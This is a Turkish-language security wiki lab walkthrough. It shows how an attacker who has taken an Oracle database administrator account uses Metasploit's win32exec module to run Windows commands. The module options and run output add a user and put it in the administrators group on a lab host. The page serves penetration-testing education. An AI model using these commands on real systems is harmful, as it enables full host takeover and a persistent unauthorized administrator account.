Ele Geçirilen Veritabanı Yöneticisi Hesabı Üzerinden İşletim Sisteminin Ele Geçirilmesi

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara

Oracle veritabanında bulunan yetkili kullanıcıların dolaylı olarak işletim sistemi üzerinde komut çalıştırma hakları vardır. Bunun yapılabilmesi için bazı Java sınıflarının oluşturulması ve yönetici hesabı yetkileri ile çalıştırılması gerekmektedir. Bu komutlar SYSTEM hakları ile çalıştırıldığından sisteme kullanıcı ekleme, sistemde bir servisin başlatılması gibi çok önemli işlemlerin yapılmasına olanak sağlamaktadır. Bu iş için özelleştirilmiş Metasploit modülleri bulunmaktadır. “win32exec” modülü ile java sınıflarını kullanarak işletim sisteminde komut çalıştırabilmektedir. Bu modülün açık adı ve dizini aşağıdaki tabloda verilmiştir.

auxiliary/admin/oracle/post_exploitation/win32exec

Amaç:

Ele geçirilen veritabanı yöneticisi hesabı kullanılarak, Oracle veritabanının üzerinde bulunduğu işletim sistemini ele geçirmek.

Araç:

  • Metasploit

Lab Senaryosu:

“use auxiliary/admin/oracle/post_exploitation/win32exec” komutu ile modül sisteme tanıtılır. “show options” komutu ile doldurulması gerekli alanlar belirlenir ve doldurulur. Modülün sisteme tanıtılması ve gerekli parametrelerin tespit edilmesine ait çıktı aşağıda verilmiştir.

msf > use auxiliary/admin/oracle/post_exploitation/win32exec
msf  auxiliary(win32exec) > show options
Module options (auxiliary/admin/oracle/post_exploitation/win32exec):

  Name    Current Setting           Required  Description
  ----    ---------------            --------  -----------
  CMD      ipconfig                         no    	   The OS command to execute.
  DBPASS    TIGER                     yes   	The password to authenticate with.
  DBUSER    SCOTT                  yes   	The username to authenticate with.
  RHOST                                   yes   The Oracle host.
  RPORT     1521                      yes   The TNS port.
  SID      ORCL                         yes   The sid to authenticate with.

Sisteme yeni bir kullanıcı eklemek için gerekli düzenlemelerin yapılmıştır. İlgili çıktı aşağıda verilmiştir.

msf  auxiliary(win32exec) > show options
Module options (auxiliary/admin/oracle/post_exploitation/win32exec):

  Name    Current Setting        Required  Description
  ----    ---------------        --------  -----------
  CMD     net user bga bga /add      no    The OS command to execute.
  DBPASS  oracle                         yes   The password to authenticate with.
  DBUSER  system                         yes   	The username to authenticate with.
  RHOST   192.168.1.25           	yes   	The Oracle host.
  RPORT   1521                            yes   The TNS port.
  SID     xporacle                       yes   The sid to authenticate with.

Sisteme “bga” adında bir kullanıcı eklendiğini göstermek adına, aşağıda hedef sistem üzerinde mevcut kullanıcılar listelenmiştir.

Bgaveritabani.png

Sisteme eklenen kulacının, Windows sistemlerde en yetkili kullanıcı grubu olan “administrators” grubuna eklemek için gerekli düzenlemeler yapılmıştır. İlgili çıktı aşağıda verilmiştir.

msf  auxiliary(win32exec) > show options
Module options (auxiliary/admin/oracle/post_exploitation/win32exec):

  Name    Current Setting                         Required  Description
  ----    ---------------                                  --------  -------------------------
  CMD     net localgroup administrators bga /add  no    	The OS command to execute.
  DBPASS  oracle                                	yes   	The password to authenticate with.
  DBUSER  system                                  yes   	The username to authenticate with.
  RHOST   192.168.1.25                         yes   	The Oracle host.
  RPORT   1521                                       yes       The TNS port.
  SID     xporacle                                 	yes   	The sid to authenticate with.

Modülün bu düzenlemeler ile çalıştırılmış halinin çıktısı aşağıda verilmiştir.

msf  auxiliary(win32exec) > run

[*] Creating java source 'SCJ'...
[*] CREATE successful
[*] Creating procedure 'TLJ'...
[*] CREATE successful
[*] Sending command: 'net localgroup administrators bga /add'
[*] Removing java source 'SCJ'...
[*] DROP successful
[*] Removing procedure 'TLJ'...
[*] DROP successful
[*] Auxiliary module execution completed

“bga” adındaki kullanıcının sistemde “administrators” grubuna eklendiğini göstermek adına, administrators grubuna dahil olan kullanıcılar aşağıda listelenmiştir.

Bgaveritabani2.png

Böylece Oracle veritabanı açıklığı kullanılarak işletim sistemi ele geçirilmiştir.